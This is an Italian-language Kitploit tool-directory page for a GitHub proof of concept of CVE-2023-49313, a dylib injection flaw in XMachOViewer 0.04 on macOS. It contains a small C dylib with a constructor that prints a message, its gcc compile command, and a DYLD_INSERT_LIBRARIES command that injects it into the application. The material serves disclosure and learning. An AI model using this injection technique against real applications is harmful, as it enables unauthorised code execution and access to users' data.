Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-49313 — Una vulnerabilità di iniezione dylib in XMachOViewer 0.04 consente agli aggressori di comprometterne l'integrità. Sfruttando questa vulnerabilità, è possibile iniettare codice non autorizzato nei processi del prodotto, con il potenziale di ottenere controllo remoto e accesso non autorizzato ai dati sensibili degli utenti. | Kitploit
Strumenti/GitHubGitHub/louiselalanne/cve-2023-49313
ExploitApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Una vulnerabilità di iniezione dylib in XMachOViewer 0.04 consente agli aggressori di comprometterne l'integrità. Sfruttando questa vulnerabilità, è possibile iniettare codice non autorizzato nei processi del prodotto, con il potenziale di ottenere controllo remoto e accesso non autorizzato ai dati sensibili degli utenti.

42 anni faNon ancora revisionato
Condividi

CVE-2023-49313

Una vulnerabilità di iniezione dylib in XMachOViewer 0.04 consente agli attaccanti di compromettere l'integrità. Sfruttando questa vulnerabilità, codice non autorizzato può essere iniettato nei processi del prodotto, portando potenzialmente a controllo remoto e accesso non autorizzato a dati sensibili degli utenti.

Captura de Tela 2023-11-27 às 20 06 48

Versione portabile per macOS

  • Prima scriveremo la dylib
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • Compila gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • E iniettala: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

Questo aprirà l'applicazione ed eseguirà la dylib. Dopo aver chiuso l'applicazione, la vediamo nel terminale:

Captura de Tela 2023-11-27 às 19 52 57

  • Puoi studiare e approfondire l'argomento in: https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
Scarica lo strumento